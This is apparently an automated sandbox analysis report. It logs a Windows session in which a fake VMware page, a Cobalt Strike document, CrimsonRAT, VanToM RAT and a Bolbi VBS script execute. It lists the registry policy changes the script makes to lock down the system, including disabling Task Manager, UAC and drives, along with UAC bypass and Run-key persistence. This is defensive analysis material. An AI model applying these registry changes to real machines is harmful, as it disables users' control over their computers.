2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 1452 2440 chrome.exe 80 PID 2440 wrote to memory of 1452 2440 chrome.exe 80 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 PID 2440 wrote to memory of 4208 2440 chrome.exe 81 -
System policy modification 1 TTPs 31 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\TaskbarNoPinnedList = "1" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate = "1" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun\ = "rpdbfk.exe" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList = "1" wscript.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun\ = "cscript.exe" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPinningToTaskbar = "1" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList = "1" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMorePrograms, = "1" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun\ = "wmplayer.exe" wscript.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "ATTENTION!" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu = "1" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings = "1" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSecurityTab = "1" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun\ = "explorer.exe" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" wscript.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayItemsDisplay = "1" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Your PC has been wrecked by Bolbi!" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableLockWorkstation = "1" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "67108863" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions = "1" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun = "1" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun\ wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun\ = "wscript.exe" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar = "1" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1" wscript.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\VMware-Workstation-16-Pro-07-10.html1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd7d6ccc40,0x7ffd7d6ccc4c,0x7ffd7d6ccc582⤵PID:4688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1804,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1796 /prefetch:22⤵PID:3480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2032,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2076 /prefetch:32⤵PID:1452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2148,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2380 /prefetch:82⤵PID:4208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3056,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3060 /prefetch:12⤵PID:1680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3212 /prefetch:12⤵PID:4124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3536,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4564 /prefetch:82⤵PID:4640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4568,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4724 /prefetch:12⤵PID:2664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5044,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4832 /prefetch:12⤵PID:2608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5020,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4872 /prefetch:12⤵PID:3580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5004,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5216 /prefetch:12⤵PID:2660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5432,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5372 /prefetch:12⤵PID:3076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5428,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5512 /prefetch:12⤵PID:4996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5748,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5720 /prefetch:12⤵PID:392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5744,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6112 /prefetch:12⤵PID:4384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=6088,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5672 /prefetch:12⤵PID:4064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=6216,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6356 /prefetch:12⤵PID:2832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5756,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5760 /prefetch:12⤵PID:552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5240,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5048 /prefetch:82⤵PID:4648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5556,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5532 /prefetch:82⤵PID:3660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6188,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6352 /prefetch:12⤵PID:928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6376,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5860 /prefetch:12⤵PID:3404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5904,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6572 /prefetch:82⤵
- NTFS ADS
PID:8
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5116,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5940 /prefetch:82⤵
- NTFS ADS
PID:4724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5092,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6100 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5072,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5488 /prefetch:12⤵PID:3884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6316,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6564 /prefetch:12⤵PID:3196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4988,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6444 /prefetch:82⤵PID:5036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6672,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6680 /prefetch:82⤵PID:2832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=6304,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5712 /prefetch:12⤵PID:3140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=4836,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6508 /prefetch:12⤵PID:2472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=4840,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6576 /prefetch:12⤵PID:408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3040,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6736 /prefetch:82⤵PID:2240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6668,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6872 /prefetch:82⤵PID:1676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6728,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6804 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:4780
-
-
C:\Users\Admin\Downloads\7z2408-x64.exe"C:\Users\Admin\Downloads\7z2408-x64.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1488
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6052,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4296 /prefetch:82⤵
- NTFS ADS
PID:5288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6924,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=212 /prefetch:82⤵
- NTFS ADS
PID:5752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7116,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7100 /prefetch:82⤵PID:5236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7132,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6992 /prefetch:82⤵PID:5528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7136,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7060 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:5360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4296,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7288 /prefetch:82⤵
- NTFS ADS
PID:3172
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\CobaltStrike.doc" /o ""2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2620 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe3⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:4300
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=2672,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7244 /prefetch:82⤵PID:6052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7164,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7240 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:2668
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6136 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"3⤵
- Executes dropped EXE
PID:2832
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7504,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7516 /prefetch:82⤵
- NTFS ADS
PID:5460
-
-
C:\Users\Admin\Downloads\VanToM-Rat.bat"C:\Users\Admin\Downloads\VanToM-Rat.bat"2⤵
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:6072 -
C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5832
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7280,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7352 /prefetch:82⤵
- NTFS ADS
PID:2888
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Bolbi.vbs"2⤵PID:5460
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\Downloads\Bolbi.vbs" /elevated3⤵
- UAC bypass
- Blocklisted process makes network request
- Disables cmd.exe use via registry modification
- Event Triggered Execution: Image File Execution Options Injection
- Adds Run key to start application
- Checks whether UAC is enabled
